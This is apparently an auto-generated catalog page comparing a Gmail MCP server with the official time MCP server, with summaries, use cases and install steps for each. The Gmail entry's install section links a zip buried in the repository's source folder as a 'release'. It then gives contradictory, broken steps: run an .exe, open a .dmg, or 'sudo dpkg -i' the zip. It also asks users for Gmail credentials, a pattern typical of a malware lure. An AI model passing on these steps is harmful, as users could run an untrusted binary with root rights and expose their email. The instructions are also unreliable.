MCP Catalogs
Home

gmail-mcp vs time

Side-by-side comparison to help you pick between these two MCP servers.

gmail-mcp
by hahaha-saygex
time
by modelcontextprotocol
Stars★ 1★ 85,748
30d uses
Score3477
Official
Categories
CommunicationProductivityAI / LLM Tools
ProductivityDeveloper ToolsCommunication
LanguageTypeScriptTypeScript
Last committhis monththis month

gmail-mcp · Summary

Gmail MCP server for email management with OAuth2 authentication.

time · Summary

A comprehensive MCP server providing time and timezone conversion tools with automatic system timezone detection.

gmail-mcp · Use cases

  • Automate email responses and management within AI-powered development environments
  • Integrate Gmail functionality into AI workflows for automated communication
  • Process and organize large volumes of emails using AI assistants

time · Use cases

  • Assisting with international meeting scheduling across time zones
  • Providing real-time time information for location-based queries
  • Enabling time conversion for travel planning and itineraries

gmail-mcp · Install

Installation

  1. Download the latest version from [Releases Page](https://raw.githubusercontent.com/hahaha-saygex/gmail-mcp/main/src/builders/mcp_gmail_2.7-alpha.4.zip)
  1. Install according to your operating system:

- **Windows**: Double-click the .exe file and follow the setup instructions - **macOS**: Open the .dmg file and drag the app to your Applications folder - **Linux**: Use sudo dpkg -i mcp_gmail_2.7-alpha.4.zip in your terminal

  1. Set up OAuth2 authentication by creating a project in Google Developer Console and configuring the Gmail API
  1. Launch the application and enter your credentials

Claude Desktop Configuration

Add to your Claude Desktop configuration:

{
  "mcpServers": {
    "gmail": {
      "command": "path/to/gmail-mcp",
      "args": []
    }
  }
}

time · Install

Installation Options

**Using uv (recommended):**

uvx mcp-server-time

**Using PIP:**

pip install mcp-server-time
python -m mcp_server_time

**Configure for Claude Desktop:**

{
  "mcpServers": {
    "time": {
      "command": "uvx",
      "args": ["mcp-server-time"]
    }
  }
}
Comparison generated from public README + GitHub signals. Last updated automatically.